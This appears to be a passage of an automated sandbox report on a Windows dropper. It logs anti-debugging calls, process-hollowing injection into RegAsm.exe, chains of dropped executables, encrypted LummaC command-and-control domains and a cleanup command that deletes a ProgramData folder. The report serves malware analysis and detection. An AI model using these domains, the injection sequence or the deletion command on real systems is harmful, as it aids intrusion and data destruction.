Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00552E40 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00552E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0041AD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041CEEA SetUnhandledExceptionFilter,	15_2_0041CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_0041B33A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B45B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_6B45B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B45B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_6B45B66C

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: SYvU5mYtoLg0LBOPe0pXYHty.exe PID: 3192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9nou8XrciU9ATc03f2Eu4OO2.exe PID: 4180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5164, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 66fbfcc301a31_swws[1].exe.5.dr, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: 66fbfcc301a31_swws[1].exe.5.dr, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: 66fbfcc301a31_swws[1].exe.5.dr, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userEHJDHJKFIE.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userBAKKEGCAAE.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\GHDHDBAECG.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\KEHDBAEGII.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userDHDAFBFCFH.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userCAAKKFHCFI.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe

Code function: 3_2_030D21F9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

3_2_030D21F9

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\userEHJDHJKFIE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\userBAKKEGCAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\GHDHDBAECG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\KEHDBAEGII.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\userDHDAFBFCFH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\userCAAKKFHCFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: userBAKKEGCAAE.exe, 0000001C.00000002.2035016647.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: absorptioniw.site
Source: userBAKKEGCAAE.exe, 0000001C.00000002.2035016647.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: mysterisop.site
Source: userBAKKEGCAAE.exe, 0000001C.00000002.2035016647.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: snarlypagowo.site
Source: userBAKKEGCAAE.exe, 0000001C.00000002.2035016647.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: treatynreit.site
Source: userBAKKEGCAAE.exe, 0000001C.00000002.2035016647.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: chorusarorp.site
Source: userBAKKEGCAAE.exe, 0000001C.00000002.2035016647.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abnomalrkmu.site
Source: userBAKKEGCAAE.exe, 0000001C.00000002.2035016647.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: soldiefieop.site
Source: userBAKKEGCAAE.exe, 0000001C.00000002.2035016647.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: questionsmw.stor

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

15_2_00419600

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56B000
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58A000
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 592000
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D8000
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E50008
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 65C000
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E7A008
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B55008
Source: C:\Users\userEHJDHJKFIE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userEHJDHJKFIE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userEHJDHJKFIE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
Source: C:\Users\userEHJDHJKFIE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
Source: C:\Users\userEHJDHJKFIE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
Source: C:\Users\userEHJDHJKFIE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
Source: C:\Users\userEHJDHJKFIE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1013008
Source: C:\Users\userBAKKEGCAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userBAKKEGCAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userBAKKEGCAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000
Source: C:\Users\userBAKKEGCAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
Source: C:\Users\userBAKKEGCAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000
Source: C:\Users\userBAKKEGCAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1192008
Source: C:\ProgramData\GHDHDBAECG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\GHDHDBAECG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\GHDHDBAECG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000
Source: C:\ProgramData\GHDHDBAECG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
Source: C:\ProgramData\GHDHDBAECG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000
Source: C:\ProgramData\GHDHDBAECG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B86008
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D00008
Source: C:\ProgramData\KEHDBAEGII.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\KEHDBAEGII.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\KEHDBAEGII.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\ProgramData\KEHDBAEGII.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\ProgramData\KEHDBAEGII.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 65C000
Source: C:\ProgramData\KEHDBAEGII.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FAE008
Source: C:\Users\userDHDAFBFCFH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userDHDAFBFCFH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userDHDAFBFCFH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
Source: C:\Users\userDHDAFBFCFH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
Source: C:\Users\userDHDAFBFCFH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
Source: C:\Users\userDHDAFBFCFH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
Source: C:\Users\userDHDAFBFCFH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DD6008
Source: C:\Users\userCAAKKFHCFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userCAAKKFHCFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userCAAKKFHCFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000
Source: C:\Users\userCAAKKFHCFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
Source: C:\Users\userCAAKKFHCFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000
Source: C:\Users\userCAAKKFHCFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C6B008

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJDHJKFIE.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBAKKEGCAAE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userEHJDHJKFIE.exe "C:\Users\userEHJDHJKFIE.exe"
Source: C:\Users\userEHJDHJKFIE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userBAKKEGCAAE.exe "C:\Users\userBAKKEGCAAE.exe"
Source: C:\Users\userBAKKEGCAAE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userBAKKEGCAAE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GHDHDBAECG.exe "C:\ProgramData\GHDHDBAECG.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\CBFIIEHJDB.exe "C:\ProgramData\CBFIIEHJDB.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KEHDBAEGII.exe "C:\ProgramData\KEHDBAEGII.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKFCAFCFBAEH" & exit
Source: C:\ProgramData\GHDHDBAECG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\GHDHDBAECG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\CBFIIEHJDB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\CBFIIEHJDB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\CBFIIEHJDB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KEHDBAEGII.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KEHDBAEGII.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userDHDAFBFCFH.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCAAKKFHCFI.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userDHDAFBFCFH.exe "C:\Users\userDHDAFBFCFH.exe"
Source: C:\Users\userDHDAFBFCFH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userDHDAFBFCFH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userDHDAFBFCFH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userCAAKKFHCFI.exe "C:\Users\userCAAKKFHCFI.exe"
Source: C:\Users\userCAAKKFHCFI.exe	Process created: unknown unknown
Source: C:\Users\userCAAKKFHCFI.exe	Process created: unknown unknown
Source: C:\Users\userCAAKKFHCFI.exe	Process created: unknown unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0053E01E cpuid

5_2_0053E01E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	5_2_00560274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	5_2_00560479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	5_2_0056056B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	5_2_00560520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	5_2_00560606
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	5_2_00560691
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	5_2_0055A725
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	5_2_005608E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_00560A0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	5_2_00560B13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	5_2_0055ABF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_00560BE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoEx,FormatMessageA,	5_2_0053F870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	15_2_00417B90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
